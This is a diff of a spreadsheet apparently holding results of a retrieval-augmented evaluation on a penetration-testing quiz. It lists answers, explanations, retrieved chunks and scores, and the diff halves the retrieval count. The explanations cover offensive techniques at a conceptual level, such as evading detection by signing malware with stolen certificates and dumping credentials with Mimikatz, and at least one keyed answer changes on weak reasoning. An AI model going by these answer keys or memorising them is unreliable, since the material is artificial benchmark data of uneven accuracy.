-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I218" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J218" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K218" t="inlineStr">
         <is>
@@ -15136,7 +14022,7 @@
       <c r="F219" t="inlineStr">
         <is>
           <t>Answer: Using an Out of Band (OOB) technique to test SQL injection vulnerabilities
-Explanation: The acceptable practice among the choices for ethical penetration testing is using an Out of Band (OOB) technique to test SQL injection vulnerabilities. This advanced technique involves causing the server to make a connection back to the attacker's server. It is used to confirm and exploit SQL injection flaws while carefully avoiding disruption of the application's normal operations. This method has the advantage of proving the vulnerability without inserting malicious data into the database. In contrast, deploying</t>
+Explanation: The acceptable practice among the choices for ethical penetration testing is using an Out of Band (OOB) technique to test SQL injection vulnerabilities. This advanced technique involves causing the server to make a connection back to the attacker's server. It is used to confirm and exploit SQL injection flaws while carefully avoiding disruption of the application's normal operations. This method has the advantage of proving the vulnerability without inserting malicious data into the database. In contrast, deploying ransomware on a production environment, conducting brute-force attacks on external facing login portals during peak hours, and analyzing traffic with Wireshark in promiscuous mode without permission are all practices that could disrupt normal operations or violate privacy, making them unacceptable for ethical penetration testing.</t>
         </is>
       </c>
       <c r="G219" t="inlineStr">
@@ -15150,21 +14036,16 @@
 preemware_pentestingeval.pdf (Chunk: f763cdb5-6965-4d89-8a52-efa5fe071b81, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e189877f-2ed8-49a5-ae4b-00bb7694f847, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I219" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J219" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K219" t="inlineStr">
         <is>
@@ -15203,14 +14084,7 @@
       <c r="F220" t="inlineStr">
         <is>
           <t>Answer: Injecting malicious SQL queries to manipulate database information
-Explanation: SQL injection on a web application is the correct answer as it involves injecting malicious SQL
-statements into an input field for execution, which can manipulate a database to execute arbitrary code,
-depending on the database's configuration and the nature of the vulnerability. This method does not typically
-require prior authentication to the web application, making it a highly effective attack vector for gaining
-unauthorized access and executing code. Buffer overflow in a local program, while potent for code execution,
-generally requires local access or at least some interaction with the affected software on the target server.
-Phishing campaigns and cross-site scripting primarily target user data and client browsers, respectively, and
-typically do not result in direct arbitrary code execution on a server.</t>
+Explanation: The most effective method for exploiting SQL injection vulnerabilities in web applications is by injecting malicious SQL queries via the input data from the client to the application. Successful exploitation can allow attackers to view data that they are not normally able to retrieve, such as other users' data or any other data that the application itself can access. Option 1, memory corruption vulnerabilities exploiting buffer overflows, pertains more to software applications where the bounds of memory buffers are not properly checked. Option 2, reverse engineering the application to understand its API calls, is mainly useful in binary analysis or when understanding communication protocols rather than in exploiting SQL-related flaws. Option 3, identifying unencrypted data stores in a mobile application, while a security issue, does not directly exploit SQL injection vulnerabilities.</t>
         </is>
       </c>
       <c r="G220" t="inlineStr">
@@ -15224,21 +14098,16 @@
 preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d9939fbc-1cef-4606-95f6-da7f4a8cb6cf, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I220" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J220" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K220" t="inlineStr">
         <is>
@@ -15277,7 +14146,7 @@
       <c r="F221" t="inlineStr">
         <is>
           <t>Answer: Using stolen certificates to sign a malicious payload
-Explanation: In the context of maintaining persistence within a target's corporate network without detection, using stolen certificates to sign a malicious payload is the most effective technique. This method leverages legitimate digital certificates stolen from trusted entities to sign malware, making the malicious software appear credible and benign to security systems and antivirus programs, thereby evading detection. Conducting brute force attacks on service accounts, while effective for gaining initial access, is noisy and likely to trigger account lockouts and alerts. Exploiting zero-day vulnerabilities, though powerful, may draw attention due to the rarity of such vulnerabilities. Performing SQL injection on login forms is not as effective in maintaining persistence within a network without detection, as it primarily focuses on gaining initial access rather than long-term persistence.</t>
+Explanation: In a sophisticated red team operation aimed at maintaining persistence within a target's corporate network without detection, the most effective technique would be using stolen certificates to sign a malicious payload. This method leverages legitimate digital certificates stolen from trusted entities to sign malware, making the malicious software appear credible and benign to security systems and antivirus programs, thereby evading detection. While exploiting zero-day vulnerabilities can also be powerful, it may draw attention due to its rarity, and conducting brute force attacks on service accounts is noisy and likely to trigger account lockouts and alerts. Performing SQL injection on login forms is more focused on initial access rather than maintaining persistence without detection.</t>
         </is>
       </c>
       <c r="G221" t="inlineStr">
@@ -15291,21 +14160,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I221" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J221" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K221" t="inlineStr">
         <is>
@@ -15344,7 +14208,7 @@
       <c r="F222" t="inlineStr">
         <is>
           <t>Answer: Metasploit Framework
-Explanation: The Metasploit Framework is the correct answer because it is specifically designed for developing and executing exploit code against a remote target machine. It includes tools for crafting payloads, conducting social engineering attacks, and evasion techniques, making it integral for penetration tests that need a comprehensive tool capable of handling various aspects of an assessment. Wireshark, while invaluable as a network protocol analyzer, serves mainly in network traffic monitoring and analysis and is not used for exploitation. John the Ripper is primarily used for password cracking and wouldn't be utilized to directly exploit network vulnerabilities. Burp Suite excels in web application security testing but does not focus on network-level exploits, making it less suitable compared to Metasploit Framework for this particular operation.</t>
+Explanation: The Metasploit Framework is specifically designed for developing and executing exploit code against a remote target machine. It also includes tools for crafting payloads, conducting social engineering attacks, and evasion techniques, making it integral for penetration tests that need a comprehensive tool capable of handling various aspects of an assessment. Wireshark, while invaluable as a network protocol analyzer, serves mainly in network traffic monitoring and analysis and is not used for exploitation. John the Ripper is primarily used for password cracking and wouldn't be utilized to directly exploit network vulnerabilities. Burp Suite excels in web application security testing but does not focus on network-level exploits, making it less suitable compared to Metasploit Framework for this particular operation.</t>
         </is>
       </c>
       <c r="G222" t="inlineStr">
@@ -15358,21 +14222,16 @@
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I222" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J222" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K222" t="inlineStr">
         <is>
@@ -15411,7 +14270,7 @@
       <c r="F223" t="inlineStr">
         <is>
           <t>Answer: Mimikatz
-Explanation: Mimikatz is designed to extract plaintext passwords, hashes, PIN codes, and kerberos tickets from memory, specifically targeting the Windows operating system's authentication mechanisms. Metasploit, while a powerful penetration testing toolkit, is more general-purpose and not as specialized in memory-resident credential harvesting as Mimikatz. Cobalt Strike is more focused on providing a post-exploitation framework rather than direct credentials extraction, and Wireshark is a network protocol analyzer useful for capturing and analyzing the contents of network traffic, not extracting information directly from OS memory.</t>
+Explanation: Mimikatz is a powerful tool designed specifically for Windows security auditing and penetration testing. It is highly effective in extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. Additionally, it can perform pass-the-hash, pass-the-ticket, or build Golden tickets, making it the ideal choice for extracting cached credentials from Windows domain controllers. While ProcDump is useful for capturing process dump files, PsExec executes processes on other systems, and Netcat is a networking utility for reading from and writing to network connections using TCP or UDP, none of these tools are as specialized in memory-resident credential harvesting as Mimikatz.</t>
         </is>
       </c>
       <c r="G223" t="inlineStr">
@@ -15425,21 +14284,16 @@
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 4)
-cowWhySo-pentest-redteam-steering.md (Chunk: d29fee93-c440-4931-9641-da6248fd3fe0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: sparse, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: d29fee93-c440-4931-9641-da6248fd3fe0, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I223" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J223" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K223" t="inlineStr">
         <is>
@@ -15477,15 +14331,8 @@
       </c>
       <c r="F224" t="inlineStr">
         <is>
-          <t>Answer: Exploiting SQL injection flaws to execute commands on the database server
-Explanation: In the context of an advanced persistent threat (APT) campaign against a highly secure network,
-the most likely initial technique used by red team operators to maintain stealth while gathering critical
-information is exploiting SQL injection flaws to execute commands on the database server. This method allows
-attackers to manipulate backend database queries and potentially gain access to sensitive information without
-raising immediate suspicion. While using Nmap can help identify vulnerabilities, it doesn't provide direct access or
-allow for data exfiltration. Employing a black-box testing methodology may reveal vulnerabilities but does not
-necessarily lead to stealthy data gathering. Taking advantage of unused and outdated network protocols could be
-used, but it is less likely as these are typically well-documented and monitored in high-security environments.</t>
+          <t>Answer: Employing a black-box testing methodology without prior knowledge about the system
+Explanation: In the context of an advanced persistent threat (APT) campaign against a highly secure network, red team operators would likely use a black-box testing methodology without prior knowledge about the system. This approach allows them to simulate real-world APT actors who are not familiar with the target environment but can still identify vulnerabilities and exploit them for their advantage. It also ensures that they maintain stealth while gathering critical information, as they do not have any preconceived notions or assumptions about the system's defenses. While using Nmap to probe system ports and identify vulnerable services, exploiting SQL injection flaws, and taking advantage of unused and outdated network protocols can be effective techniques, they are more focused on specific types of vulnerabilities rather than maintaining stealth throughout the entire campaign.</t>
         </is>
       </c>
       <c r="G224" t="inlineStr">
@@ -15499,21 +14346,16 @@
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I224" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J224" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K224" t="inlineStr">
         <is>
@@ -15552,7 +14394,7 @@
       <c r="F225" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in an API authentication mechanism
-Explanation: In the context of exploit development, a buffer overflow in an API authentication mechanism is most likely to be targeted to execute arbitrary code on a server via poorly handled user authentication inputs. This is because it directly involves the handling of input data that can be excessively large or malformed to overflow the buffer, leading to arbitrary code execution. SQL injection targets manipulation of database queries rather than direct code execution, Cross-site scripting (XSS) primarily affects client-side browsers by executing scripts in the user's session, not directly on the server, and CSRF involves unauthorized actions performed on behalf of a logged-in user, not buffer overflow or direct code execution on the server.</t>
+Explanation: In the context of exploit development, a buffer overflow in an API authentication mechanism is most likely to be targeted to execute arbitrary code on a server via poorly handled user authentication inputs. This is because it directly involves the handling of input data that can be excessively large or malformed to overflow the buffer, leading to arbitrary code execution. SQL injection targets manipulation of database queries rather than direct code execution. Cross-site scripting (XSS) primarily affects client-side browsers by executing scripts in the user's session, not directly on the server, and CSRF involves unauthorized actions performed on behalf of a logged-in user, not buffer overflow or direct code execution on the server.</t>
         </is>
       </c>
       <c r="G225" t="inlineStr">
@@ -15566,21 +14408,16 @@
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I225" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J225" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K225" t="inlineStr">
         <is>
@@ -15619,7 +14456,7 @@
       <c r="F226" t="inlineStr">
         <is>
           <t>Answer: Crafting a spear-phishing attack to install a backdoor on a targeted system
-Explanation: In red team exercises, the goal is often to emulate sophisticated cyber attacks to test an organization's defenses. Social engineering techniques like phishing are commonly used. Among the options, a spear-phishing attack is particularly suitable for targeting specific individuals such as high-profile executives. Unlike generic phishing campaigns, spear-phishing involves crafting a personalized attack based on the executive's specific details and habits, which increases the likelihood of the executive falling prey to the attack and inadvertently providing access to their corporate email account. 'Using a fuzzing tool to discover buffer overflow vulnerabilities' is irrelevant as it pertains to software and system testing rather than social engineering. 'Applying a brute-force attack to crack encrypted files' and 'Implementing a phishing campaign to gain access credentials' are not specific to high-profile executives or targeted attacks, making them less suitable for the context of this question.</t>
+Explanation: In red team exercises, the goal is often to emulate sophisticated cyber attacks to test an organization's defenses. Social engineering techniques like phishing are commonly used. Among the options, a spear-phishing attack is particularly suitable for targeting specific individuals such as high-profile executives. Unlike generic phishing campaigns, spear-phishing involves crafting a personalized attack based on the executive's specific details and habits, which increases the likelihood of the executive falling prey to the attack and inadvertently providing access to their corporate email account. 'Using a fuzzing tool to discover buffer overflow vulnerabilities' is irrelevant as it pertains to software and system testing rather than social engineering. 'Applying a brute-force attack to crack encrypted files' and 'Implementing a phishing campaign to gain access credentials' are not specific enough for targeting high-profile executives, making them less effective in this context.</t>
         </is>
       </c>
       <c r="G226" t="inlineStr">
@@ -15633,21 +14470,16 @@
 preemware_pentestingeval.pdf (Chunk: 2e5f6c3f-5d6d-4105-a3ca-8d4f6eef701d, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I226" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J226" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K226" t="inlineStr">
         <is>
@@ -15700,21 +14532,16 @@
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d8c4c51e-7616-430d-9196-7af2b1f35cb2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I227" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J227" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K227" t="inlineStr">
         <is>
@@ -15753,7 +14580,7 @@
       <c r="F228" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow attacks
-Explanation: Buffer overflow attacks specifically target the memory space management weaknesses inherent in non-memory-safe programming languages like C and C++. By providing more data than a buffer is allocated to hold, an attacker can overwrite adjacent memory space, which often includes critical program control information. Success in such attacks can lead to arbitrary code execution under the privileges of the violated process. SQL injection, by contrast, involves inserting malicious SQL queries through user inputs and Cross-site scripting (XSS) involves injecting scripts into web pages viewed by other users, while directory traversal deals with manipulating file paths to access unauthorized files or directories on a server.</t>
+Explanation: Buffer overflow attacks specifically target the memory space management weaknesses inherent in non-memory-safe programming languages like C and C++. By providing more data than a buffer is allocated to hold, an attacker can overwrite adjacent memory space, which often includes critical program control information. Success in such attacks can lead to arbitrary code execution under the privileges of the violated process. SQL injection, by contrast, involves inserting malicious SQL queries through user inputs in web applications to manipulate or extract data from a database. Cross-site scripting (XSS) vulnerabilities allow an attacker to inject malicious scripts into web pages viewed by other users, typically for stealing session cookies or other sensitive information. Directory traversal attacks involve exploiting weaknesses in file system access controls to access files outside the intended directory structure.</t>
         </is>
       </c>
       <c r="G228" t="inlineStr">
@@ -15767,21 +14594,16 @@
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d8c4c51e-7616-430d-9196-7af2b1f35cb2, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 0f10f6d3-5dcc-4aad-bb64-5a4e62ffeeac, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I228" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J228" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K228" t="inlineStr">
         <is>
@@ -15820,7 +14642,7 @@
       <c r="F229" t="inlineStr">
         <is>
           <t>Answer: Remote Code Execution (RCE) through deserialization
-Explanation: Remote Code Execution (RCE) through deserialization is the most likely attack vector to allow an attacker to gain unauthorized access and potentially control over server-side operations through specially crafted input data. This type of vulnerability occurs when an application deserializes untrusted or malicious data, allowing an attacker to execute arbitrary code on the server. SQL injection, while a severe vulnerability, primarily allows an attacker to manipulate database queries rather than directly executing code on the server. Cross-site scripting (XSS) and session fixation are also serious vulnerabilities but typically target other users of the application or manipulate user sessions, not directly controlling server-side operations.</t>
+Explanation: Remote code execution (RCE) vulnerabilities are critical security flaws that allow an attacker to execute arbitrary code on a server or other target system, typically giving the attacker the ability to perform any operation that the system allows. This could include executing commands, installing malware, or manipulating server processes. In this context, RCE through deserialization is the most likely attack vector to allow unauthorized access and potential control over server-side operations through specially crafted input data. While SQL injection and XSS are powerful attacks, they primarily focus on data exfiltration or accessing unauthorized data rather than executing commands. Session fixation via cookie manipulation is a session hijacking attack that aims to take control of an existing valid session but does not directly involve server-side code execution.</t>
         </is>
       </c>
       <c r="G229" t="inlineStr">
@@ -15834,21 +14656,16 @@
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 6)
